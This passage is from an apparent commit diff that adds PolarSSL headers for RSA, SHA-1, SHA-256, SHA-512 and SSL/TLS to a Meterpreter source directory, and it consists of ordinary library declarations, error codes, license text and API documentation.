mpi Q; /*!< 2nd prime factor */
mpi DP; /*!< D % (P - 1) */
mpi DQ; /*!< D % (Q - 1) */
mpi QP; /*!< 1 / (Q % P) */
mpi RN; /*!< cached R^2 mod N */
mpi RP; /*!< cached R^2 mod P */
mpi RQ; /*!< cached R^2 mod Q */
int padding; /*!< 1.5 or OAEP/PSS */
int hash_id; /*!< hash identifier */
int (*f_rng)(void *); /*!< RNG function */
void *p_rng; /*!< RNG parameter */
}
rsa_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief Initialize an RSA context
*
* \param ctx RSA context to be initialized
* \param padding RSA_PKCS_V15 or RSA_PKCS_V21
* \param hash_id RSA_PKCS_V21 hash identifier
* \param f_rng RNG function
* \param p_rng RNG parameter
*
* \note The hash_id parameter is actually ignored
* when using RSA_PKCS_V15 padding.
*
* \note Currently (xyssl-0.8), RSA_PKCS_V21 padding
* is not supported.
*/
void rsa_init( rsa_context *ctx,
int padding,
int hash_id,
int (*f_rng)(void *),
void *p_rng );
/**
* \brief Generate an RSA keypair
*
* \param ctx RSA context that will hold the key
* \param nbits size of the public key in bits
* \param exponent public exponent (e.g., 65537)
*
* \note rsa_init() must be called beforehand to setup
* the RSA context (especially f_rng and p_rng).
*
* \return 0 if successful, or an POLARSSL_ERR_RSA_XXX error code
*/
int rsa_gen_key( rsa_context *ctx, int nbits, int exponent );
/**
* \brief Check a public RSA key
*
* \param ctx RSA context to be checked
*
* \return 0 if successful, or an POLARSSL_ERR_RSA_XXX error code
*/
int rsa_check_pubkey( rsa_context *ctx );
/**
* \brief Check a private RSA key
*
* \param ctx RSA context to be checked
*
* \return 0 if successful, or an POLARSSL_ERR_RSA_XXX error code
*/
int rsa_check_privkey( rsa_context *ctx );
/**
* \brief Do an RSA public key operation
*
* \param ctx RSA context
* \param input input buffer
* \param output output buffer
*
* \return 0 if successful, or an POLARSSL_ERR_RSA_XXX error code
*
* \note This function does NOT take care of message
* padding. Also, be sure to set input[0] = 0 or assure that
* input is smaller than N.
*
* \note The input and output buffers must be large
* enough (eg. 128 bytes if RSA-1024 is used).
*/
int rsa_public( rsa_context *ctx,
unsigned char *input,
unsigned char *output );
/**
* \brief Do an RSA private key operation
*
* \param ctx RSA context
* \param input input buffer
* \param output output buffer
*
* \return 0 if successful, or an POLARSSL_ERR_RSA_XXX error code
*
* \note The input and output buffers must be large
* enough (eg. 128 bytes if RSA-1024 is used).
*/
int rsa_private( rsa_context *ctx,
unsigned char *input,
unsigned char *output );
/**
* \brief Add the message padding, then do an RSA operation
*
* \param ctx RSA context
* \param mode RSA_PUBLIC or RSA_PRIVATE
* \param ilen contains the plaintext length
* \param input buffer holding the data to be encrypted
* \param output buffer that will hold the ciphertext
*
* \return 0 if successful, or an POLARSSL_ERR_RSA_XXX error code
*
* \note The output buffer must be as large as the size
* of ctx->N (eg. 128 bytes if RSA-1024 is used).
*/
int rsa_pkcs1_encrypt( rsa_context *ctx,
int mode, int ilen,
unsigned char *input,
unsigned char *output );
/**
* \brief Do an RSA operation, then remove the message padding
*
* \param ctx RSA context
* \param mode RSA_PUBLIC or RSA_PRIVATE
* \param input buffer holding the encrypted data
* \param output buffer that will hold the plaintext
* \param olen will contain the plaintext length
* \param output_max_len maximum length of the output buffer
*
* \return 0 if successful, or an POLARSSL_ERR_RSA_XXX error code
*
* \note The output buffer must be as large as the size
* of ctx->N (eg. 128 bytes if RSA-1024 is used) otherwise
* an error is thrown.
*/
int rsa_pkcs1_decrypt( rsa_context *ctx,
int mode, int *olen,
unsigned char *input,
unsigned char *output,
int output_max_len);
/**
* \brief Do a private RSA to sign a message digest
*
* \param ctx RSA context
* \param mode RSA_PUBLIC or RSA_PRIVATE
* \param hash_id RSA_RAW, SIG_RSA_MD{2,4,5} or SIG_RSA_SHA{1,224,256,384,512}
* \param hashlen message digest length (for RSA_RAW only)
* \param hash buffer holding the message digest
* \param sig buffer that will hold the ciphertext
*
* \return 0 if the signing operation was successful,
* or an POLARSSL_ERR_RSA_XXX error code
*
* \note The "sig" buffer must be as large as the size
* of ctx->N (eg. 128 bytes if RSA-1024 is used).
*/
int rsa_pkcs1_sign( rsa_context *ctx,
int mode,
int hash_id,
int hashlen,
unsigned char *hash,
unsigned char *sig );
/**
* \brief Do a public RSA and check the message digest
*
* \param ctx points to an RSA public key
* \param mode RSA_PUBLIC or RSA_PRIVATE
* \param hash_id RSA_RAW, RSA_MD{2,4,5} or RSA_SHA{1,256}
* \param hashlen message digest length (for RSA_RAW only)
* \param hash buffer holding the message digest
* \param sig buffer holding the ciphertext
*
* \return 0 if the verify operation was successful,
* or an POLARSSL_ERR_RSA_XXX error code
*
* \note The "sig" buffer must be as large as the size
* of ctx->N (eg. 128 bytes if RSA-1024 is used).
*/
int rsa_pkcs1_verify( rsa_context *ctx,
int mode,
int hash_id,
int hashlen,
unsigned char *hash,
unsigned char *sig );
/**
* \brief Free the components of an RSA key
*/
void rsa_free( rsa_context *ctx );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int rsa_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* rsa.h */

137
c/meterpreter/source/common/polarssl/sha1.h Normal file

@ -0,0 +1,137 @@
/**
* \file sha1.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_SHA1_H
#define POLARSSL_SHA1_H
/**
* \brief SHA-1 context structure
*/
typedef struct
{
unsigned long total[2]; /*!< number of bytes processed */
unsigned long state[5]; /*!< intermediate digest state */
unsigned char buffer[64]; /*!< data block being processed */
unsigned char ipad[64]; /*!< HMAC: inner padding */
unsigned char opad[64]; /*!< HMAC: outer padding */
}
sha1_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief SHA-1 context setup
*
* \param ctx context to be initialized
*/
void sha1_starts( sha1_context *ctx );
/**
* \brief SHA-1 process buffer
*
* \param ctx SHA-1 context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void sha1_update( sha1_context *ctx, unsigned char *input, int ilen );
/**
* \brief SHA-1 final digest
*
* \param ctx SHA-1 context
* \param output SHA-1 checksum result
*/
void sha1_finish( sha1_context *ctx, unsigned char output[20] );
/**
* \brief Output = SHA-1( input buffer )
*
* \param input buffer holding the data
* \param ilen length of the input data
* \param output SHA-1 checksum result
*/
void sha1( unsigned char *input, int ilen, unsigned char output[20] );
/**
* \brief Output = SHA-1( file contents )
*
* \param path input file name
* \param output SHA-1 checksum result
*
* \return 0 if successful, 1 if fopen failed,
* or 2 if fread failed
*/
int sha1_file( char *path, unsigned char output[20] );
/**
* \brief SHA-1 HMAC context setup
*
* \param ctx HMAC context to be initialized
* \param key HMAC secret key
* \param keylen length of the HMAC key
*/
void sha1_hmac_starts( sha1_context *ctx, unsigned char *key, int keylen );
/**
* \brief SHA-1 HMAC process buffer
*
* \param ctx HMAC context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void sha1_hmac_update( sha1_context *ctx, unsigned char *input, int ilen );
/**
* \brief SHA-1 HMAC final digest
*
* \param ctx HMAC context
* \param output SHA-1 HMAC checksum result
*/
void sha1_hmac_finish( sha1_context *ctx, unsigned char output[20] );
/**
* \brief Output = HMAC-SHA-1( hmac key, input buffer )
*
* \param key HMAC secret key
* \param keylen length of the HMAC key
* \param input buffer holding the data
* \param ilen length of the input data
* \param output HMAC-SHA-1 result
*/
void sha1_hmac( unsigned char *key, int keylen,
unsigned char *input, int ilen,
unsigned char output[20] );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int sha1_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* sha1.h */

145
c/meterpreter/source/common/polarssl/sha2.h Normal file

@ -0,0 +1,145 @@
/**
* \file sha2.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_SHA2_H
#define POLARSSL_SHA2_H
/**
* \brief SHA-256 context structure
*/
typedef struct
{
unsigned long total[2]; /*!< number of bytes processed */
unsigned long state[8]; /*!< intermediate digest state */
unsigned char buffer[64]; /*!< data block being processed */
unsigned char ipad[64]; /*!< HMAC: inner padding */
unsigned char opad[64]; /*!< HMAC: outer padding */
int is224; /*!< 0 => SHA-256, else SHA-224 */
}
sha2_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief SHA-256 context setup
*
* \param ctx context to be initialized
* \param is224 0 = use SHA256, 1 = use SHA224
*/
void sha2_starts( sha2_context *ctx, int is224 );
/**
* \brief SHA-256 process buffer
*
* \param ctx SHA-256 context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void sha2_update( sha2_context *ctx, unsigned char *input, int ilen );
/**
* \brief SHA-256 final digest
*
* \param ctx SHA-256 context
* \param output SHA-224/256 checksum result
*/
void sha2_finish( sha2_context *ctx, unsigned char output[32] );
/**
* \brief Output = SHA-256( input buffer )
*
* \param input buffer holding the data
* \param ilen length of the input data
* \param output SHA-224/256 checksum result
* \param is224 0 = use SHA256, 1 = use SHA224
*/
void sha2( unsigned char *input, int ilen,
unsigned char output[32], int is224 );
/**
* \brief Output = SHA-256( file contents )
*
* \param path input file name
* \param output SHA-224/256 checksum result
* \param is224 0 = use SHA256, 1 = use SHA224
*
* \return 0 if successful, 1 if fopen failed,
* or 2 if fread failed
*/
int sha2_file( char *path, unsigned char output[32], int is224 );
/**
* \brief SHA-256 HMAC context setup
*
* \param ctx HMAC context to be initialized
* \param key HMAC secret key
* \param keylen length of the HMAC key
* \param is224 0 = use SHA256, 1 = use SHA224
*/
void sha2_hmac_starts( sha2_context *ctx, unsigned char *key, int keylen,
int is224 );
/**
* \brief SHA-256 HMAC process buffer
*
* \param ctx HMAC context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void sha2_hmac_update( sha2_context *ctx, unsigned char *input, int ilen );
/**
* \brief SHA-256 HMAC final digest
*
* \param ctx HMAC context
* \param output SHA-224/256 HMAC checksum result
*/
void sha2_hmac_finish( sha2_context *ctx, unsigned char output[32] );
/**
* \brief Output = HMAC-SHA-256( hmac key, input buffer )
*
* \param key HMAC secret key
* \param keylen length of the HMAC key
* \param input buffer holding the data
* \param ilen length of the input data
* \param output HMAC-SHA-224/256 result
* \param is224 0 = use SHA256, 1 = use SHA224
*/
void sha2_hmac( unsigned char *key, int keylen,
unsigned char *input, int ilen,
unsigned char output[32], int is224 );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int sha2_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* sha2.h */

153
c/meterpreter/source/common/polarssl/sha4.h Normal file

@ -0,0 +1,153 @@
/**
* \file sha4.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_SHA4_H
#define POLARSSL_SHA4_H
#if defined(_MSC_VER) || defined(__WATCOMC__)
#define UL64(x) x##ui64
#define int64 __int64
#else
#define UL64(x) x##ULL
#define int64 long long
#endif
/**
* \brief SHA-512 context structure
*/
typedef struct
{
unsigned int64 total[2]; /*!< number of bytes processed */
unsigned int64 state[8]; /*!< intermediate digest state */
unsigned char buffer[128]; /*!< data block being processed */
unsigned char ipad[128]; /*!< HMAC: inner padding */
unsigned char opad[128]; /*!< HMAC: outer padding */
int is384; /*!< 0 => SHA-512, else SHA-384 */
}
sha4_context;
#ifdef __cplusplus
extern "C" {
#endif
/**
* \brief SHA-512 context setup
*
* \param ctx context to be initialized
* \param is384 0 = use SHA512, 1 = use SHA384
*/
void sha4_starts( sha4_context *ctx, int is384 );
/**
* \brief SHA-512 process buffer
*
* \param ctx SHA-512 context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void sha4_update( sha4_context *ctx, unsigned char *input, int ilen );
/**
* \brief SHA-512 final digest
*
* \param ctx SHA-512 context
* \param output SHA-384/512 checksum result
*/
void sha4_finish( sha4_context *ctx, unsigned char output[64] );
/**
* \brief Output = SHA-512( input buffer )
*
* \param input buffer holding the data
* \param ilen length of the input data
* \param output SHA-384/512 checksum result
* \param is384 0 = use SHA512, 1 = use SHA384
*/
void sha4( unsigned char *input, int ilen,
unsigned char output[64], int is384 );
/**
* \brief Output = SHA-512( file contents )
*
* \param path input file name
* \param output SHA-384/512 checksum result
* \param is384 0 = use SHA512, 1 = use SHA384
*
* \return 0 if successful, 1 if fopen failed,
* or 2 if fread failed
*/
int sha4_file( char *path, unsigned char output[64], int is384 );
/**
* \brief SHA-512 HMAC context setup
*
* \param ctx HMAC context to be initialized
* \param is384 0 = use SHA512, 1 = use SHA384
* \param key HMAC secret key
* \param keylen length of the HMAC key
*/
void sha4_hmac_starts( sha4_context *ctx, unsigned char *key, int keylen,
int is384 );
/**
* \brief SHA-512 HMAC process buffer
*
* \param ctx HMAC context
* \param input buffer holding the data
* \param ilen length of the input data
*/
void sha4_hmac_update( sha4_context *ctx, unsigned char *input, int ilen );
/**
* \brief SHA-512 HMAC final digest
*
* \param ctx HMAC context
* \param output SHA-384/512 HMAC checksum result
*/
void sha4_hmac_finish( sha4_context *ctx, unsigned char output[64] );
/**
* \brief Output = HMAC-SHA-512( hmac key, input buffer )
*
* \param key HMAC secret key
* \param keylen length of the HMAC key
* \param input buffer holding the data
* \param ilen length of the input data
* \param output HMAC-SHA-384/512 result
* \param is384 0 = use SHA512, 1 = use SHA384
*/
void sha4_hmac( unsigned char *key, int keylen,
unsigned char *input, int ilen,
unsigned char output[64], int is384 );
/**
* \brief Checkup routine
*
* \return 0 if successful, or 1 if the test failed
*/
int sha4_self_test( int verbose );
#ifdef __cplusplus
}
#endif
#endif /* sha4.h */

541
c/meterpreter/source/common/polarssl/ssl.h Normal file

@ -0,0 +1,541 @@
/**
* \file ssl.h
*
* Based on XySSL: Copyright (C) 2006-2008 Christophe Devine
*
* Copyright (C) 2009 Paul Bakker <polarssl_maintainer at polarssl dot org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#ifndef POLARSSL_SSL_H
#define POLARSSL_SSL_H
#include <time.h>
#include "polarssl/net.h"
#include "polarssl/dhm.h"
#include "polarssl/rsa.h"
#include "polarssl/md5.h"
#include "polarssl/sha1.h"
#include "polarssl/x509.h"
#define POLARSSL_ERR_SSL_FEATURE_UNAVAILABLE -0x1000
#define POLARSSL_ERR_SSL_BAD_INPUT_DATA -0x1800
#define POLARSSL_ERR_SSL_INVALID_MAC -0x2000
#define POLARSSL_ERR_SSL_INVALID_RECORD -0x2800
#define POLARSSL_ERR_SSL_INVALID_MODULUS_SIZE -0x3000
#define POLARSSL_ERR_SSL_UNKNOWN_CIPHER -0x3800
#define POLARSSL_ERR_SSL_NO_CIPHER_CHOSEN -0x4000
#define POLARSSL_ERR_SSL_NO_SESSION_FOUND -0x4800
#define POLARSSL_ERR_SSL_NO_CLIENT_CERTIFICATE -0x5000
#define POLARSSL_ERR_SSL_CERTIFICATE_TOO_LARGE -0x5800
#define POLARSSL_ERR_SSL_CERTIFICATE_REQUIRED -0x6000
#define POLARSSL_ERR_SSL_PRIVATE_KEY_REQUIRED -0x6800
#define POLARSSL_ERR_SSL_CA_CHAIN_REQUIRED -0x7000
#define POLARSSL_ERR_SSL_UNEXPECTED_MESSAGE -0x7800
#define POLARSSL_ERR_SSL_FATAL_ALERT_MESSAGE -0x8000
#define POLARSSL_ERR_SSL_PEER_VERIFY_FAILED -0x8800
#define POLARSSL_ERR_SSL_PEER_CLOSE_NOTIFY -0x9000
#define POLARSSL_ERR_SSL_BAD_HS_CLIENT_HELLO -0x9800
#define POLARSSL_ERR_SSL_BAD_HS_SERVER_HELLO -0xA000
#define POLARSSL_ERR_SSL_BAD_HS_CERTIFICATE -0xA800
#define POLARSSL_ERR_SSL_BAD_HS_CERTIFICATE_REQUEST -0xB000
#define POLARSSL_ERR_SSL_BAD_HS_SERVER_KEY_EXCHANGE -0xB800
#define POLARSSL_ERR_SSL_BAD_HS_SERVER_HELLO_DONE -0xC000
#define POLARSSL_ERR_SSL_BAD_HS_CLIENT_KEY_EXCHANGE -0xC800
#define POLARSSL_ERR_SSL_BAD_HS_CERTIFICATE_VERIFY -0xD000
#define POLARSSL_ERR_SSL_BAD_HS_CHANGE_CIPHER_SPEC -0xD800
#define POLARSSL_ERR_SSL_BAD_HS_FINISHED -0xE000
/*
* Various constants
*/
#define SSL_MAJOR_VERSION_3 3
#define SSL_MINOR_VERSION_0 0 /*!< SSL v3.0 */
#define SSL_MINOR_VERSION_1 1 /*!< TLS v1.0 */
#define SSL_MINOR_VERSION_2 2 /*!< TLS v1.1 */
#define SSL_IS_CLIENT 0
#define SSL_IS_SERVER 1
#define SSL_COMPRESS_NULL 0
#define SSL_VERIFY_NONE 0
#define SSL_VERIFY_OPTIONAL 1
#define SSL_VERIFY_REQUIRED 2
#define SSL_MAX_CONTENT_LEN 16384
/*
* Allow an extra 512 bytes for the record header
* and encryption overhead (counter + MAC + padding).
*/
#define SSL_BUFFER_LEN (SSL_MAX_CONTENT_LEN + 512)
/*
* Supported ciphersuites
*/
#define SSL_RSA_RC4_128_MD5 4
#define SSL_RSA_RC4_128_SHA 5
#define SSL_RSA_DES_168_SHA 10
#define SSL_EDH_RSA_DES_168_SHA 22
#define SSL_RSA_AES_128_SHA 47
#define SSL_RSA_AES_256_SHA 53
#define SSL_EDH_RSA_AES_256_SHA 57
#define SSL_RSA_CAMELLIA_128_SHA 0x41
#define SSL_RSA_CAMELLIA_256_SHA 0x84
#define SSL_EDH_RSA_CAMELLIA_256_SHA 0x88
/*
* Message, alert and handshake types
*/
#define SSL_MSG_CHANGE_CIPHER_SPEC 20
#define SSL_MSG_ALERT 21
#define SSL_MSG_HANDSHAKE 22
#define SSL_MSG_APPLICATION_DATA 23
#define SSL_ALERT_CLOSE_NOTIFY 0
#define SSL_ALERT_WARNING 1
#define SSL_ALERT_FATAL 2
#define SSL_ALERT_NO_CERTIFICATE 41
#define SSL_HS_HELLO_REQUEST 0
#define SSL_HS_CLIENT_HELLO 1
#define SSL_HS_SERVER_HELLO 2
#define SSL_HS_CERTIFICATE 11
#define SSL_HS_SERVER_KEY_EXCHANGE 12
#define SSL_HS_CERTIFICATE_REQUEST 13
#define SSL_HS_SERVER_HELLO_DONE 14
#define SSL_HS_CERTIFICATE_VERIFY 15
#define SSL_HS_CLIENT_KEY_EXCHANGE 16
#define SSL_HS_FINISHED 20
/*
* TLS extensions
*/
#define TLS_EXT_SERVERNAME 0
#define TLS_EXT_SERVERNAME_HOSTNAME 0
/*
* SSL state machine
*/
typedef enum
{
SSL_HELLO_REQUEST,
SSL_CLIENT_HELLO,
SSL_SERVER_HELLO,
SSL_SERVER_CERTIFICATE,
SSL_SERVER_KEY_EXCHANGE,
SSL_CERTIFICATE_REQUEST,
SSL_SERVER_HELLO_DONE,
SSL_CLIENT_CERTIFICATE,
SSL_CLIENT_KEY_EXCHANGE,
SSL_CERTIFICATE_VERIFY,
SSL_CLIENT_CHANGE_CIPHER_SPEC,
SSL_CLIENT_FINISHED,
SSL_SERVER_CHANGE_CIPHER_SPEC,
SSL_SERVER_FINISHED,
SSL_FLUSH_BUFFERS,
SSL_HANDSHAKE_OVER
}
ssl_states;
typedef struct _ssl_session ssl_session;
typedef struct _ssl_context ssl_context;
/*
* This structure is used for session resuming.
*/
struct _ssl_session
{
time_t start; /*!< starting time */
int cipher; /*!< chosen cipher */
int length; /*!< session id length */
unsigned char id[32]; /*!< session identifier */
unsigned char master[48]; /*!< the master secret */
ssl_session *next; /*!< next session entry */
};
struct _ssl_context
{
/*
* Miscellaneous
*/
int state; /*!< SSL handshake: current state */
int major_ver; /*!< equal to SSL_MAJOR_VERSION_3 */
int minor_ver; /*!< either 0 (SSL3) or 1 (TLS1.0) */
int max_major_ver; /*!< max. major version from client */
int max_minor_ver; /*!< max. minor version from client */
/*
* Callbacks (RNG, debug, I/O)
*/
int (*f_rng)(void *);
void (*f_dbg)(void *, int, char *);
int (*f_recv)(void *, unsigned char *, int);
int (*f_send)(void *, unsigned char *, int);
void *p_rng; /*!< context for the RNG function */
void *p_dbg; /*!< context for the debug function */
void *p_recv; /*!< context for reading operations */
void *p_send; /*!< context for writing operations */
/*
* Session layer
*/
int resume; /*!< session resuming flag */
int timeout; /*!< sess. expiration time */
ssl_session *session; /*!< current session data */
int (*s_get)(ssl_context *); /*!< (server) get callback */
int (*s_set)(ssl_context *); /*!< (server) set callback */
/*
* Record layer (incoming data)
*/
unsigned char *in_ctr; /*!< 64-bit incoming message counter */
unsigned char *in_hdr; /*!< 5-byte record header (in_ctr+8) */
unsigned char *in_msg; /*!< the message contents (in_hdr+5) */
unsigned char *in_offt; /*!< read offset in application data */
int in_msgtype; /*!< record header: message type */
int in_msglen; /*!< record header: message length */
int in_left; /*!< amount of data read so far */
int in_hslen; /*!< current handshake message length */
int nb_zero; /*!< # of 0-length encrypted messages */
/*
* Record layer (outgoing data)
*/
unsigned char *out_ctr; /*!< 64-bit outgoing message counter */
unsigned char *out_hdr; /*!< 5-byte record header (out_ctr+8) */
unsigned char *out_msg; /*!< the message contents (out_hdr+5) */
int out_msgtype; /*!< record header: message type */
int out_msglen; /*!< record header: message length */
int out_left; /*!< amount of data not yet written */
/*
* PKI layer
*/
rsa_context *rsa_key; /*!< own RSA private key */
x509_cert *own_cert; /*!< own X.509 certificate */
x509_cert *ca_chain; /*!< own trusted CA chain */
x509_crl *ca_crl; /*!< trusted CA CRLs */
x509_cert *peer_cert; /*!< peer X.509 cert chain */
char *peer_cn; /*!< expected peer CN */
int endpoint; /*!< 0: client, 1: server */
int authmode; /*!< verification mode */
int client_auth; /*!< flag for client auth. */
int verify_result; /*!< verification result */
/*
* Crypto layer
*/
dhm_context dhm_ctx; /*!< DHM key exchange */
md5_context fin_md5; /*!< Finished MD5 checksum */
sha1_context fin_sha1; /*!< Finished SHA-1 checksum */
int do_crypt; /*!< en(de)cryption flag */
int *ciphers; /*!< allowed ciphersuites */
int pmslen; /*!< premaster length */
int keylen; /*!< symmetric key length */
int minlen; /*!< min. ciphertext length */
int ivlen; /*!< IV length */
int maclen; /*!< MAC length */
unsigned char randbytes[64]; /*!< random bytes */
unsigned char premaster[256]; /*!< premaster secret */
unsigned char iv_enc[16]; /*!< IV (encryption) */
unsigned char iv_dec[16]; /*!< IV (decryption) */
unsigned char mac_enc[32]; /*!< MAC (encryption) */
unsigned char mac_dec[32]; /*!< MAC (decryption) */
unsigned long ctx_enc[128]; /*!< encryption context */
unsigned long ctx_dec[128]; /*!< decryption context */
/*
* TLS extensions
*/
unsigned char *hostname;
unsigned long hostname_len;
};
#ifdef __cplusplus
extern "C" {
#endif
extern int ssl_default_ciphers[];
/**
* \brief Initialize an SSL context
*
* \param ssl SSL context
*
* \return 0 if successful, or 1 if memory allocation failed
*/
int ssl_init( ssl_context *ssl );
/**
* \brief Set the current endpoint type
*
* \param ssl SSL context
* \param endpoint must be SSL_IS_CLIENT or SSL_IS_SERVER
*/
void ssl_set_endpoint( ssl_context *ssl, int endpoint );
/**
* \brief Set the certificate verification mode
*
* \param ssl SSL context
* \param mode can be:
*
* SSL_VERIFY_NONE: peer certificate is not checked (default),
* this is insecure and SHOULD be avoided.
*
* SSL_VERIFY_OPTIONAL: peer certificate is checked, however the
* handshake continues even if verification failed;
* ssl_get_verify_result() can be called after the
* handshake is complete.
*
* SSL_VERIFY_REQUIRED: peer *must* present a valid certificate,
* handshake is aborted if verification failed.
*/
void ssl_set_authmode( ssl_context *ssl, int authmode );
/**
* \brief Set the random number generator callback
*
* \param ssl SSL context
* \param f_rng RNG function
* \param p_rng RNG parameter
*/
void ssl_set_rng( ssl_context *ssl,
int (*f_rng)(void *),
void *p_rng );
/**
* \brief Set the debug callback
*
* \param ssl SSL context
* \param f_dbg debug function
* \param p_dbg debug parameter
*/
void ssl_set_dbg( ssl_context *ssl,
void (*f_dbg)(void *, int, char *),
void *p_dbg );
/**
* \brief Set the underlying BIO read and write callbacks
*
* \param ssl SSL context
* \param f_recv read callback
* \param p_recv read parameter
* \param f_send write callback
* \param p_send write parameter
*/
void ssl_set_bio( ssl_context *ssl,
int (*f_recv)(void *, unsigned char *, int), void *p_recv,
int (*f_send)(void *, unsigned char *, int), void *p_send );
/**
* \brief Set the session callbacks (server-side only)
*
* \param ssl SSL context
* \param s_get session get callback
* \param s_set session set callback
*/
void ssl_set_scb( ssl_context *ssl,
int (*s_get)(ssl_context *),
int (*s_set)(ssl_context *) );
/**
* \brief Set the session resuming flag, timeout and data
*
* \param ssl SSL context
* \param resume if 0 (default), the session will not be resumed
* \param timeout session timeout in seconds, or 0 (no timeout)
* \param session session context
*/
void ssl_set_session( ssl_context *ssl, int resume, int timeout,
ssl_session *session );
/**
* \brief Set the list of allowed ciphersuites
*
* \param ssl SSL context
* \param ciphers 0-terminated list of allowed ciphers
*/
void ssl_set_ciphers( ssl_context *ssl, int *ciphers );
/**
* \brief Set the data required to verify peer certificate
*
* \param ssl SSL context
* \param ca_chain trusted CA chain
* \param ca_crl trusted CA CRLs
* \param peer_cn expected peer CommonName (or NULL)
*
* \note TODO: add two more parameters: depth and crl
*/
void ssl_set_ca_chain( ssl_context *ssl, x509_cert *ca_chain,
x509_crl *ca_crl, char *peer_cn );
/**
* \brief Set own certificate and private key
*
* \param ssl SSL context
* \param own_cert own public certificate
* \param rsa_key own private RSA key
*/
void ssl_set_own_cert( ssl_context *ssl, x509_cert *own_cert,
rsa_context *rsa_key );
/**
* \brief Set the Diffie-Hellman public P and G values,
* read as hexadecimal strings (server-side only)
*
* \param ssl SSL context
* \param dhm_P Diffie-Hellman-Merkle modulus
* \param dhm_G Diffie-Hellman-Merkle generator
*
* \return 0 if successful
*/
int ssl_set_dh_param( ssl_context *ssl, char *dhm_P, char *dhm_G );
/**
* \brief Set hostname for ServerName TLS Extension
*
*
* \param ssl SSL context
* \param hostname the server hostname
*
* \return 0 if successful
*/
int ssl_set_hostname( ssl_context *ssl, char *hostname );
/**
* \brief Return the number of data bytes available to read
*
* \param ssl SSL context
*
* \return how many bytes are available in the read buffer
*/
int ssl_get_bytes_avail( ssl_context *ssl );
/**
* \brief Return the result of the certificate verification
*
* \param ssl SSL context
*
* \return 0 if successful, or a combination of:
* BADCERT_EXPIRED
* BADCERT_REVOKED
* BADCERT_CN_MISMATCH
* BADCERT_NOT_TRUSTED
*/
int ssl_get_verify_result( ssl_context *ssl );
/**
* \brief Return the name of the current cipher
*
* \param ssl SSL context
*
* \return a string containing the cipher name
*/
char *ssl_get_cipher( ssl_context *ssl );
/**
* \brief Perform the SSL handshake
*
* \param ssl SSL context
*
* \return 0 if successful, POLARSSL_ERR_NET_TRY_AGAIN,
* or a specific SSL error code.
*/
int ssl_handshake( ssl_context *ssl );
/**
* \brief Read at most 'len' application data bytes
*
* \param ssl SSL context
* \param buf buffer that will hold the data
* \param len how many bytes must be read
*
* \return This function returns the number of bytes read,
* or a negative error code.
*/
int ssl_read( ssl_context *ssl, unsigned char *buf, int len );
/**
* \brief Write exactly 'len' application data bytes
*
* \param ssl SSL context
* \param buf buffer holding the data
* \param len how many bytes must be written
*
* \return This function returns the number of bytes written,
* or a negative error code.
*
* \note When this function returns POLARSSL_ERR_NET_TRY_AGAIN,
* it must be called later with the *same* arguments,
* until it returns a positive value.
*/
int ssl_write( ssl_context *ssl, unsigned char *buf, int len );
/**
* \brief Notify the peer that the connection is being closed
*/
int ssl_close_notify( ssl_context *ssl );
/**
* \brief Free an SSL context
*/
void ssl_free( ssl_context *ssl );
/*
* Internal functions (do not call directly)
*/
int ssl_handshake_client( ssl_context *ssl );
